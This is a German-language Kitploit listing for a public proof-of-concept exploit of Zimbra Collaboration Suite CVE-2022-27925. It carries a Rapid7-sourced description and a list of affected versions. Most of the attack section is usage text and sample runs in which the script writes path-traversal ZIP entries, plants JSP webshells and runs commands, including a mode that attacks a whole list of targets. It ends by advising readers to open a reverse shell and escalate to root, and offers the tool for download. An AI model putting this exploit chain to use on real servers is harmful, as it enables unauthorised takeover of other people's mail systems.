Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-27925 — Zimbra CVE-2022-27925 PoC | Kitploit
Tools/GitHubGitHub/josexv1/cve-2022-27925
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubjosexv1/cve-2022-27925

CVE-2022-27925

Zimbra CVE-2022-27925 PoC

Repository anzeigen
4319vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-27925

Beschreibung

Am 10. Mai 2022 veröffentlichte Zimbra die Versionen 9.0.0 Patch 24 und 8.8.15 Patch 31, um mehrere Schwachstellen in der Zimbra Collaboration Suite zu beheben, darunter CVE-2022-27924 (über die wir bereits berichtet haben) und CVE-2022-27925.

Ursprünglich bezeichnete Zimbra CVE-2022-27925 als einen authentifizierten Path-Traversal-Angriff, bei dem ein Administrator-Benutzer Dateien in jedes beliebige Verzeichnis im Dateisystem als das Zimbra-Konto schreiben konnte. Da der Angriff ursprünglich als ein reiner Administrator-Angriff angesehen wurde, vergab das NVD einen CVSS-Basisscore von 7,8. Später bemerkte Volexity, dass Angreifer, die diese Schwachstelle ausnutzten, einen Weg gefunden hatten, die Administratoranforderungen zu umgehen, und berichtete am 10. August 2022 darüber. Diese neue Authentifizierungsumgehung erhielt eine neue Kennung – CVE-2022-37042.

Durch die Kombination der ursprünglichen Path-Traversal-Schwachstelle und der neuen Authentifizierungsumgehung können Angreifer ein Zimbra Collaboration Suite-System anonym über den Administrator-Port (standardmäßig 7071) remote kompromittieren. In Kombination mit einer derzeit ungepatchten Privilegienausweitungs-Schwachstelle, über die wir kürzlich berichtet und einen Exploit geschrieben haben, führen diese drei Schwachstellen auf ungepatchten Systemen zur Remote-Befehlsausführung als Root-Benutzer.

Obwohl die öffentlichen Sicherheitshinweise dies nicht erwähnen, ist nach unserer Analyse die Zimbra Collaboration Suite Network Edition (die kostenpflichtige Edition) verwundbar, die Open Source Edition (kostenlos) jedoch nicht (da sie nicht den verwundbaren mboximport-Endpunkt besitzt). Verwundbare Versionen sind:

root@kitploit:~
Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (und früher)
Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (und früher)

Diese Schwachstellen (und andere in Zimbra) werden für weit verbreitete Ausnutzung im Internet ins Visier genommen und sollten daher so schnell wie möglich gepatcht oder offline genommen werden. Falls Sie vermuten, kompromittiert worden zu sein, stellt Zimbra Schritte zur Verfügung, um Ihren Zimbra Collaboration Suite-Server von Grund auf mit dem neuesten Patch neu aufzubauen, ohne Daten zu verlieren.

Source: https://attackerkb.com/topics/dSu4KGZiFd/cve-2022-27925/rapid7-analysis

Verwendung

root@kitploit:~
 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

usage: exploit.py [-h] [-t TARGET] [-l LIST]

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URl with protocol HTTPS
  -l LIST, --list LIST  List of targets

Beispielausführung

root@kitploit:~
root@root# python exploit.py -t zimbra.example.com
 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/BQOQBN.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux

root@root# python exploit.py -l targets.txt

 _____   _           __
/__  /  (_)___ ___  / /_  _________ _
  / /  / / __ `__ \/ __ \/ ___/ __ `/
 / /__/ / / / / / / /_/ / /  / /_/ /
/____/_/_/ /_/ /_/_.___/_/   \__,_/
                    CVE-2022-27925

[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Testing URL: https://zimbra.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[+] Webshell works!!
[+] WebShell location: https://zimbra.example.com/zimbraAdmin/7RRT4G.jsp
[+] Uname -a output: Linux zimbra.docker 3.10.0-1127.8.2.el7.x86_64 #1 SMP Thu May 7 19:30:37 EDT 2020 x86_64 x86_64 x86_64 GNU/Linux
[!] Testing URL: https://patched.example.com
[!] Target is up!
[!] Creating malicious ZIP path: ../../../../mailboxd/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty_base/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable
[!] Creating malicious ZIP path: ../../../../jetty/webapps/zimbraAdmin/
[!] Exploiting!
[!] Testing webshell
[-] Target not vulnerable

root@root# .

Rooten der Box!

Um die Box zu rooten, können Sie eine Reverse-Shell aufrufen und dann Slaper's LPE verwenden.

Tool herunterladen